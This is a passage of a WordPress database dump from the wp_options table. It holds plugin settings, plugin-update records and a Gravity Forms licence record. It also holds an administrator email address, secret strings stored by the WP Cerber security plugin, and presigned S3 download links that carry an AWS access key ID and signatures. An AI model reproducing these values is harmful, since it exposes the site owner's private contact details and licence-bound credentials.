must agree with our Terms and Conditions.\",\"translation\":\"You must agree with our Terms and Conditions.\"},{\"id\":14,\"name\":\"Subscribe Missing Email\",\"string\":\"Oops! Email is empty.\",\"translation\":\"Oops! Email is empty.\"}]','yes'),(12554,'niteoCS_unsplash_0','','yes'),(12555,'niteoCS_unsplash_1','','yes'),(12556,'niteoCS_unsplash_2','','yes'),(12557,'niteoCS_unsplash_3','','yes'),(12558,'niteoCS_unsplash_feed','3','yes'),(12559,'niteoCS_URL_redirect','','yes'),(12560,'niteoCS_version','4.1.7','yes'),(12561,'niteoCS_video_autoloop','1','yes'),(12562,'niteoCS_video_file_url','','yes'),(12563,'niteoCS_video_thumb','','yes'),(12564,'niteoCS_vimeo_url','','yes'),(12565,'niteoCS_youtube_url','','yes'),(1736,'_wp_suggested_policy_text_has_changed','changed','yes'),(127,'https_detection_errors','a:1:{s:17:\"bad_response_code\";a:1:{i:0;s:19:\"Service Unavailable\";}}','yes'),(675,'_transient_health-check-site-status-result','{\"good\":16,\"recommended\":5,\"critical\":0}','yes'),(190,'cerber-groove-x','a:2:{i:0;s:29:\"S1sz8TvVJDZypEQtK7PNnLOxrIhYa\";i:1;s:26:\"w3dGOg41Xsq7RKvhtj5Mf9AJ8o\";}','no'),(904,'classic-editor-allow-users','allow','yes'),(170,'finished_updating_comment_type','1','yes'),(19056,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1681902660;s:8:\"response\";a:2:{s:41:\"cmp-coming-soon-maintenance/niteo-cmp.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:41:\"w.org/plugins/cmp-coming-soon-maintenance\";s:4:\"slug\";s:27:\"cmp-coming-soon-maintenance\";s:6:\"plugin\";s:41:\"cmp-coming-soon-maintenance/niteo-cmp.php\";s:11:\"new_version\";s:5:\"4.1.8\";s:3:\"url\";s:58:\"https://wordpress.org/plugins/cmp-coming-soon-maintenance/\";s:7:\"package\";s:76:\"https://downloads.wordpress.org/plugin/cmp-coming-soon-maintenance.4.1.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/cmp-coming-soon-maintenance/assets/icon-256x256.png?rev=2393184\";s:2:\"1x\";s:80:\"https://ps.w.org/cmp-coming-soon-maintenance/assets/icon-128x128.png?rev=2393184\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:83:\"https://ps.w.org/cmp-coming-soon-maintenance/assets/banner-1544x500.png?rev=2452591\";s:2:\"1x\";s:82:\"https://ps.w.org/cmp-coming-soon-maintenance/assets/banner-772x250.png?rev=2452591\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:30:\"seo-by-rank-math/rank-math.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:30:\"w.org/plugins/seo-by-rank-math\";s:4:\"slug\";s:16:\"seo-by-rank-math\";s:6:\"plugin\";s:30:\"seo-by-rank-math/rank-math.php\";s:11:\"new_version\";s:7:\"1.0.112\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/seo-by-rank-math/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/seo-by-rank-math.1.0.112.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:61:\"https://ps.w.org/seo-by-rank-math/assets/icon.svg?rev=2848340\";s:3:\"svg\";s:61:\"https://ps.w.org/seo-by-rank-math/assets/icon.svg?rev=2848340\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/seo-by-rank-math/assets/banner-1544x500.png?rev=2639678\";s:2:\"1x\";s:71:\"https://ps.w.org/seo-by-rank-math/assets/banner-772x250.png?rev=2639678\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:3:\"6.2\";s:12:\"requires_php\";s:3:\"7.4\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:7:{s:37:\"tinymce-advanced/tinymce-advanced.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:30:\"w.org/plugins/tinymce-advanced\";s:4:\"slug\";s:16:\"tinymce-advanced\";s:6:\"plugin\";s:37:\"tinymce-advanced/tinymce-advanced.php\";s:11:\"new_version\";s:5:\"5.9.0\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/tinymce-advanced/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/tinymce-advanced.5.9.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/tinymce-advanced/assets/icon-256x256.png?rev=971511\";s:2:\"1x\";s:68:\"https://ps.w.org/tinymce-advanced/assets/icon-128x128.png?rev=971511\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/tinymce-advanced/assets/banner-1544x500.png?rev=2390186\";s:2:\"1x\";s:71:\"https://ps.w.org/tinymce-advanced/assets/banner-772x250.png?rev=2390186\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.9\";}s:19:\"akismet/akismet.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:3:\"5.1\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/akismet.5.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:60:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463\";s:2:\"1x\";s:60:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731\";s:2:\"1x\";s:62:\"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";}s:34:\"gravity-forms-pdf-extended/pdf.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:40:\"w.org/plugins/gravity-forms-pdf-extended\";s:4:\"slug\";s:26:\"gravity-forms-pdf-extended\";s:6:\"plugin\";s:34:\"gravity-forms-pdf-extended/pdf.php\";s:11:\"new_version\";s:5:\"6.5.5\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/gravity-forms-pdf-extended/\";s:7:\"package\";s:75:\"https://downloads.wordpress.org/plugin/gravity-forms-pdf-extended.6.5.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/gravity-forms-pdf-extended/assets/icon-256x256.png?rev=2664036\";s:2:\"1x\";s:79:\"https://ps.w.org/gravity-forms-pdf-extended/assets/icon-128x128.png?rev=2664036\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/gravity-forms-pdf-extended/assets/banner-1544x500.png?rev=2530048\";s:2:\"1x\";s:81:\"https://ps.w.org/gravity-forms-pdf-extended/assets/banner-772x250.png?rev=2530048\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.3\";}s:17:\"leadin/leadin.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:20:\"w.org/plugins/leadin\";s:4:\"slug\";s:6:\"leadin\";s:6:\"plugin\";s:17:\"leadin/leadin.php\";s:11:\"new_version\";s:7:\"10.1.16\";s:3:\"url\";s:37:\"https://wordpress.org/plugins/leadin/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/plugin/leadin.10.1.16.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/leadin/assets/icon-256x256.png?rev=2897109\";s:2:\"1x\";s:59:\"https://ps.w.org/leadin/assets/icon-128x128.png?rev=2897109\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/leadin/assets/banner-1544x500.png?rev=2897109\";s:2:\"1x\";s:61:\"https://ps.w.org/leadin/assets/banner-772x250.png?rev=2897109\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.4\";}s:19:\"optimus/optimus.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:21:\"w.org/plugins/optimus\";s:4:\"slug\";s:7:\"optimus\";s:6:\"plugin\";s:19:\"optimus/optimus.php\";s:11:\"new_version\";s:5:\"1.6.3\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/optimus/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/optimus.1.6.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/optimus/assets/icon-256x256.png?rev=976959\";s:2:\"1x\";s:59:\"https://ps.w.org/optimus/assets/icon-128x128.png?rev=976959\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/optimus/assets/banner-1544x500.png?rev=648854\";s:2:\"1x\";s:61:\"https://ps.w.org/optimus/assets/banner-772x250.png?rev=651424\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:31:\"custom-css-js/custom-css-js.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:27:\"w.org/plugins/custom-css-js\";s:4:\"slug\";s:13:\"custom-css-js\";s:6:\"plugin\";s:31:\"custom-css-js/custom-css-js.php\";s:11:\"new_version\";s:4:\"3.43\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/custom-css-js/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/custom-css-js.3.43.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/custom-css-js/assets/icon-128x128.png?rev=1303730\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/custom-css-js/assets/banner-1544x500.png?rev=1770945\";s:2:\"1x\";s:68:\"https://ps.w.org/custom-css-js/assets/banner-772x250.png?rev=1303730\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.0.1\";}s:53:\"supreme-modules-for-divi/supreme-modules-for-divi.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:38:\"w.org/plugins/supreme-modules-for-divi\";s:4:\"slug\";s:24:\"supreme-modules-for-divi\";s:6:\"plugin\";s:53:\"supreme-modules-for-divi/supreme-modules-for-divi.php\";s:11:\"new_version\";s:5:\"2.5.2\";s:3:\"url\";s:55:\"https://wordpress.org/plugins/supreme-modules-for-divi/\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/plugin/supreme-modules-for-divi.2.5.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:77:\"https://ps.w.org/supreme-modules-for-divi/assets/icon-256x256.png?rev=2329163\";s:2:\"1x\";s:77:\"https://ps.w.org/supreme-modules-for-divi/assets/icon-128x128.png?rev=2329163\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:80:\"https://ps.w.org/supreme-modules-for-divi/assets/banner-1544x500.png?rev=2878592\";s:2:\"1x\";s:79:\"https://ps.w.org/supreme-modules-for-divi/assets/banner-772x250.png?rev=2878592\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.5\";}}s:7:\"checked\";a:11:{s:37:\"tinymce-advanced/tinymce-advanced.php\";s:5:\"5.9.0\";s:19:\"akismet/akismet.php\";s:3:\"5.1\";s:41:\"cmp-coming-soon-maintenance/niteo-cmp.php\";s:5:\"4.1.7\";s:29:\"gravityforms/gravityforms.php\";s:5:\"2.7.4\";s:34:\"gravity-forms-pdf-extended/pdf.php\";s:5:\"6.5.5\";s:17:\"leadin/leadin.php\";s:7:\"10.1.16\";s:19:\"optimus/optimus.php\";s:5:\"1.6.3\";s:30:\"seo-by-rank-math/rank-math.php\";s:7:\"1.0.111\";s:31:\"custom-css-js/custom-css-js.php\";s:4:\"3.43\";s:53:\"supreme-modules-for-divi/supreme-modules-for-divi.php\";s:5:\"2.5.2\";s:23:\"wp-cerber/wp-cerber.php\";s:3:\"9.0\";}}','no'),(19057,'_site_transient_et_update_all_plugins','O:8:\"stdClass\":3:{s:7:\"checked\";a:11:{s:37:\"tinymce-advanced/tinymce-advanced.php\";s:5:\"5.9.0\";s:19:\"akismet/akismet.php\";s:3:\"5.1\";s:41:\"cmp-coming-soon-maintenance/niteo-cmp.php\";s:5:\"4.1.7\";s:29:\"gravityforms/gravityforms.php\";s:5:\"2.7.4\";s:34:\"gravity-forms-pdf-extended/pdf.php\";s:5:\"6.5.5\";s:17:\"leadin/leadin.php\";s:7:\"10.1.16\";s:19:\"optimus/optimus.php\";s:5:\"1.6.3\";s:30:\"seo-by-rank-math/rank-math.php\";s:7:\"1.0.111\";s:31:\"custom-css-js/custom-css-js.php\";s:4:\"3.43\";s:53:\"supreme-modules-for-divi/supreme-modules-for-divi.php\";s:5:\"2.5.2\";s:23:\"wp-cerber/wp-cerber.php\";s:3:\"9.0\";}s:8:\"response\";a:0:{}s:12:\"last_checked\";i:1681902660;}','no'),(14839,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:24:\"terra@smcorridornews.com\";s:7:\"version\";s:3:\"6.2\";s:9:\"timestamp\";i:1680131656;}','no'),(9190,'gform_version_info','a:11:{s:12:\"is_valid_key\";b:1;s:6:\"reason\";s:0:\"\";s:7:\"version\";s:5:\"2.7.4\";s:3:\"url\";s:165:\"https://s3.amazonaws.com/gravityforms/releases/gravityforms_2.7.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=gqiHdODjV3FAmYl2HYC0r4Eg8cs%3D\";s:15:\"expiration_time\";i:1686499200;s:9:\"offerings\";a:64:{s:12:\"gravityforms\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:5:\"2.7.4\";s:14:\"version_latest\";s:5:\"2.7.4\";s:3:\"url\";s:165:\"https://s3.amazonaws.com/gravityforms/releases/gravityforms_2.7.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=gqiHdODjV3FAmYl2HYC0r4Eg8cs%3D\";s:10:\"url_latest\";s:165:\"https://s3.amazonaws.com/gravityforms/releases/gravityforms_2.7.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=gqiHdODjV3FAmYl2HYC0r4Eg8cs%3D\";}s:21:\"gravityforms2checkout\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.1\";s:14:\"version_latest\";s:3:\"2.1\";s:3:\"url\";s:182:\"https://s3.amazonaws.com/gravityforms/addons/2checkout/gravityforms2checkout_2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=cehT2BkjVp%2FVHNoOZgDehDvmgbY%3D\";s:10:\"url_latest\";s:182:\"https://s3.amazonaws.com/gravityforms/addons/2checkout/gravityforms2checkout_2.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=cehT2BkjVp%2FVHNoOZgDehDvmgbY%3D\";}s:26:\"gravityformsactivecampaign\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.0\";s:14:\"version_latest\";s:5:\"2.0.1\";s:3:\"url\";s:190:\"https://s3.amazonaws.com/gravityforms/addons/activecampaign/gravityformsactivecampaign_2.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=MxtJchT6LFNY8ckVrJwd93Ei5pQ%3D\";s:10:\"url_latest\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/activecampaign/gravityformsactivecampaign_2.0.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=0abcqqrz2bKWHDM60WTQTiadesM%3D\";}s:32:\"gravityformsadvancedpostcreation\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:5:\"1.3.1\";s:3:\"url\";s:206:\"https://s3.amazonaws.com/gravityforms/addons/advancedpostcreation/gravityformsadvancedpostcreation_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=mZraYcXoIc%2FtLIaUFvTv6%2BHbZg8%3D\";s:10:\"url_latest\";s:204:\"https://s3.amazonaws.com/gravityforms/addons/advancedpostcreation/gravityformsadvancedpostcreation_1.3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=2WoZT6YipHtJYS8sgLLcY6RoHMQ%3D\";}s:20:\"gravityformsagilecrm\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.4\";s:14:\"version_latest\";s:5:\"1.4.1\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/agilecrm/gravityformsagilecrm_1.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=h56JpVRukeWj4iEsf4mZOUDamLQ%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/agilecrm/gravityformsagilecrm_1.4.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=ZDIp1qPjkVGQGC4BPrDEiYGEzoY%3D\";}s:19:\"gravityformsakismet\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.0\";s:14:\"version_latest\";s:3:\"1.0\";s:3:\"url\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/akismet/gravityformsakismet_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2B27dERcC75mnEKn9uqXSBSjijag%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/akismet/gravityformsakismet_1.0.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=%2B27dERcC75mnEKn9uqXSBSjijag%3D\";}s:24:\"gravityformsauthorizenet\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:4:\"2.11\";s:14:\"version_latest\";s:4:\"2.11\";s:3:\"url\";s:189:\"https://s3.amazonaws.com/gravityforms/addons/authorizenet/gravityformsauthorizenet_2.11.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=DTfeTXRGPt2Dxi%2F5QReqbCoTaCA%3D\";s:10:\"url_latest\";s:189:\"https://s3.amazonaws.com/gravityforms/addons/authorizenet/gravityformsauthorizenet_2.11.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=DTfeTXRGPt2Dxi%2F5QReqbCoTaCA%3D\";}s:18:\"gravityformsaweber\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:4:\"2.11\";s:14:\"version_latest\";s:6:\"2.11.2\";s:3:\"url\";s:177:\"https://s3.amazonaws.com/gravityforms/addons/aweber/gravityformsaweber_2.11.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=JJjb8nZ%2BbKJyy2wrB951lHfB2yo%3D\";s:10:\"url_latest\";s:181:\"https://s3.amazonaws.com/gravityforms/addons/aweber/gravityformsaweber_2.11.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=JVwstzd%2BCHgkFPNzfYzb76L%2Bbww%3D\";}s:21:\"gravityformsbatchbook\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.3\";s:14:\"version_latest\";s:3:\"1.3\";s:3:\"url\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/batchbook/gravityformsbatchbook_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=V3PHaI3bYIQ1jCFU4HTG7D9l6B0%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/batchbook/gravityformsbatchbook_1.3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=V3PHaI3bYIQ1jCFU4HTG7D9l6B0%3D\";}s:18:\"gravityformsbreeze\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:5:\"1.5.1\";s:3:\"url\";s:174:\"https://s3.amazonaws.com/gravityforms/addons/breeze/gravityformsbreeze_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=mZJogVI819eWUnAy5nRn119FSE8%3D\";s:10:\"url_latest\";s:178:\"https://s3.amazonaws.com/gravityforms/addons/breeze/gravityformsbreeze_1.5.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=5yAwWX%2FtWWYq7xeBfA4A8YJ4gaI%3D\";}s:27:\"gravityformscampaignmonitor\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.9\";s:14:\"version_latest\";s:5:\"3.9.1\";s:3:\"url\";s:192:\"https://s3.amazonaws.com/gravityforms/addons/campaignmonitor/gravityformscampaignmonitor_3.9.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=LmdKfrE4B4NcDFH4YylzSo2yYxs%3D\";s:10:\"url_latest\";s:194:\"https://s3.amazonaws.com/gravityforms/addons/campaignmonitor/gravityformscampaignmonitor_3.9.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=fytnL7TPpNxeTCHvlMASfyyG72E%3D\";}s:20:\"gravityformscampfire\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.1\";s:14:\"version_latest\";s:5:\"1.2.2\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/campfire/gravityformscampfire_1.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=kpGx6%2BWxzfAHSAEe%2B16ecu%2B27Ww%3D\";s:10:\"url_latest\";s:180:\"https://s3.amazonaws.com/gravityforms/addons/campfire/gravityformscampfire_1.2.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=9oMlE00W9gk3Ahwl2VYcnN5V1eQ%3D\";}s:22:\"gravityformscapsulecrm\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.6\";s:14:\"version_latest\";s:5:\"1.6.1\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/capsulecrm/gravityformscapsulecrm_1.6.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=wQJZC3qh1WEmpdmL%2BgObkAQl%2Bio%3D\";s:10:\"url_latest\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/capsulecrm/gravityformscapsulecrm_1.6.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=N3ONNINToVIlXNhEuc%2BX24pEyhk%3D\";}s:26:\"gravityformschainedselects\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.6\";s:14:\"version_latest\";s:3:\"1.6\";s:3:\"url\";s:194:\"https://s3.amazonaws.com/gravityforms/addons/chainedselects/gravityformschainedselects_1.6.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=BsXnAJipefx%2Bw1janfiQtH%2BKGJg%3D\";s:10:\"url_latest\";s:194:\"https://s3.amazonaws.com/gravityforms/addons/chainedselects/gravityformschainedselects_1.6.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=BsXnAJipefx%2Bw1janfiQtH%2BKGJg%3D\";}s:23:\"gravityformscleverreach\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.8\";s:14:\"version_latest\";s:3:\"1.8\";s:3:\"url\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/cleverreach/gravityformscleverreach_1.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=WOVsMBMjugnkjE3A1Gt9mkUUqlY%3D\";s:10:\"url_latest\";s:184:\"https://s3.amazonaws.com/gravityforms/addons/cleverreach/gravityformscleverreach_1.8.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=WOVsMBMjugnkjE3A1Gt9mkUUqlY%3D\";}s:15:\"gravityformscli\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:0:\"\";s:14:\"version_latest\";s:3:\"1.4\";s:3:\"url\";s:0:\"\";s:10:\"url_latest\";s:172:\"https://s3.amazonaws.com/gravityforms/addons/cli/gravityformscli_1.4.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=pLR%2FBN%2BawCcpq2LCazXWOyBY6q4%3D\";}s:27:\"gravityformsconstantcontact\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.7\";s:14:\"version_latest\";s:3:\"1.7\";s:3:\"url\";s:198:\"https://s3.amazonaws.com/gravityforms/addons/constantcontact/gravityformsconstantcontact_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=bbkH%2FqumRxzDmsG2%2Frsss%2Fs7szw%3D\";s:10:\"url_latest\";s:198:\"https://s3.amazonaws.com/gravityforms/addons/constantcontact/gravityformsconstantcontact_1.7.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=bbkH%2FqumRxzDmsG2%2Frsss%2Fs7szw%3D\";}s:31:\"gravityformsconversationalforms\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:10:\"1.0-beta-3\";s:14:\"version_latest\";s:10:\"1.0-beta-3\";s:3:\"url\";s:209:\"https://s3.amazonaws.com/gravityforms/addons/conversationalforms/gravityformsconversationalforms_1.0-beta-3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=yuWHLes%2FEvHd9oo5463LeEZXW4A%3D\";s:10:\"url_latest\";s:209:\"https://s3.amazonaws.com/gravityforms/addons/conversationalforms/gravityformsconversationalforms_1.0-beta-3.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=yuWHLes%2FEvHd9oo5463LeEZXW4A%3D\";}s:19:\"gravityformscoupons\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.1\";s:14:\"version_latest\";s:3:\"3.1\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/coupons/gravityformscoupons_3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=XqppzcGjnJJgFsjnNxrdspaS9e4%3D\";s:10:\"url_latest\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/coupons/gravityformscoupons_3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=XqppzcGjnJJgFsjnNxrdspaS9e4%3D\";}s:17:\"gravityformsdebug\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:0:\"\";s:14:\"version_latest\";s:10:\"1.0.beta12\";s:3:\"url\";s:0:\"\";s:10:\"url_latest\";s:179:\"https://s3.amazonaws.com/gravityforms/addons/debug/gravityformsdebug_1.0.beta12.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=6tr39RfMnDLfksNATcakvZqPbe0%3D\";}s:19:\"gravityformsdropbox\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"3.1\";s:14:\"version_latest\";s:3:\"3.1\";s:3:\"url\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/dropbox/gravityformsdropbox_3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=wkIuxQ520fH8rGh5tnQ7fbOnkZ4%3D\";s:10:\"url_latest\";s:176:\"https://s3.amazonaws.com/gravityforms/addons/dropbox/gravityformsdropbox_3.1.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=wkIuxQ520fH8rGh5tnQ7fbOnkZ4%3D\";}s:24:\"gravityformsemailoctopus\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.2\";s:14:\"version_latest\";s:5:\"1.2.2\";s:3:\"url\";s:186:\"https://s3.amazonaws.com/gravityforms/addons/emailoctopus/gravityformsemailoctopus_1.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=KfNYg6GsCcxOdQVNw4TnTYHhEak%3D\";s:10:\"url_latest\";s:188:\"https://s3.amazonaws.com/gravityforms/addons/emailoctopus/gravityformsemailoctopus_1.2.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=fnVla1TzyjokHjXGsWUW4QnSar4%3D\";}s:16:\"gravityformsemma\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"1.5\";s:14:\"version_latest\";s:5:\"1.5.2\";s:3:\"url\";s:170:\"https://s3.amazonaws.com/gravityforms/addons/emma/gravityformsemma_1.5.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=Jjc6m6RaHKsoVEmNZnAtKJjGtlg%3D\";s:10:\"url_latest\";s:172:\"https://s3.amazonaws.com/gravityforms/addons/emma/gravityformsemma_1.5.2.zip?AWSAccessKeyId=AKIA5U3GBHC5WDRZA6NK&Expires=1682075458&Signature=HqZUbvwTxU5NKkIiW4OGBpw2a0s%3D\";}s:22:\"gravityformsfreshbooks\";a:5:{s:12:\"is_available\";b:1;s:7:\"version\";s:3:\"2.